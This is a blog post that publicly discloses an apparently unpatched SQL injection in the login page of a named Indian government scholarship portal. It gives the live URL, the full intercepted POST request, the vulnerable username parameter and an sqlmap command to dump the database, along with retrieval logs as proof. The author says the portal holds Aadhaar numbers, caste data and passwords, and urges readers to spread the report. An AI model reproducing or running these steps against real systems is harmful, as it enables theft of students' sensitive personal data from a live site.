Leaked Database of CGG Website: GOVT- BUG (CRITICAL)
Hey guyz, It's me again Krishnadev P Melevila, Those who don’t know me, as usual, Search my Full Name on Google.
This time, It is a critical vulnerability on CGG(Centre for Good Governance)
What is CGG?
The Centre for Good Governance (CGG) was established in October, 2001 by the then Government of Andhra Pradesh (GoAP) in collaboration with the Department for International Development (DFID) and the World Bank to help it achieve the State’s goal of Transforming Governance.
The vulnerable site is https://studycircle.cgg.gov.in/ , This site is for Backward community students to get scholarships and other benefits from the government.
IMPORTANT NOTE: This vulnerability is reported to both NCIIPC RVDP and CGG, But there is no response from both ends post 14 days, as a concerned citizen, and very high sensitive data like aadhar numbers, DOB, Caste, Phone Number, Usernames, Passwords, etc.. are leaking, I am compelled to write this writeup here and I request you all to share this report until it reaches the hands of authorities, and I hereby declare that any unauthorized actions or misuse of this report will lead to severe impacts and I will not be responsible for any issues regarding your such actions.
Let see the vulnerability:
Vulnerability: SQL INJECTION
Impact: CRITICAL
Risks: FULL DATABASE TAKEOVER
Priority: P1
Scope: EMPLOYEE ACCESS CONTROL, ADMIN ACCESS, COMPLETE DATA LEAK
STEPS TO REPRODUCE AS IN ATTACKERS POINT OF VIEW:
- Visit https://studycircle.cgg.gov.in/tssw/Login.do and on the username and password field enter some dummy data and intercept the request on burpsuite.
POST /tssw/Login.do HTTP/1.1
Host: studycircle.cgg.gov.in
Cookie: JSESSIONID=38B2CA258CAEE2C2D55B7C1E825A11B3; JSESSIONID=1095A3A1C02708449A3EAEF100FD4679
Content-Length: 77
Cache-Control: max-age=0
Sec-Ch-Ua: “ Not A;Brand”;v=”99", “Chromium”;v=”96", “Google Chrome”;v=”96"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: “Linux”
Upgrade-Insecure-Requests: 1
Origin: https://studycircle.cgg.gov.in
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://studycircle.cgg.gov.in/tssw/Login.do
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ml;q=0.8,hi;q=0.7
Connection: close
signed=no&source=web&username=admin&password=b36ec36ee0e9be6b8b3ad80cc3e1023b2. Here the username parameter is vulnerable to sql injection. So save this request to a text file and using sqlmap enter the command:
sqlmap -r tna.txt -p username -D public — dump3. This will dump all the information on the public database and can access the complete site data even login credentials.
Proof of vulnerability[20:23:32] [INFO] retrieved: ap_tw_groupi_iii_appl_17
[20:29:02] [INFO] retrieved: ap_upsc_prelims_2016
[20:33:11] [INFO] retrieved: apbc_bank_po_coaching_reg
[20:38:43] [INFO] retrieved: apbc_group1_coaching_institution
[20:45:36] [INFO] retrieved: apbc_group1_exam_centre_dist
[20:51:01] [INFO] retrieved: apbc_groupi_coaching_17_appl
[20:56:55] [INFO] retrieved: apsw_g1_g3_final_sl_17
Don’t forget to follow me on medium and other social media.
My Instagram handle: https://instagram.com/krishnadev_p_melevila
My Twitter handle: https://twitter.com/Krishnadev_P_M
My LinkedIn handle: https://www.linkedin.com/in/krishnadevpmelevila/
My Personnel website: http://krishnadevpmelevila.com/
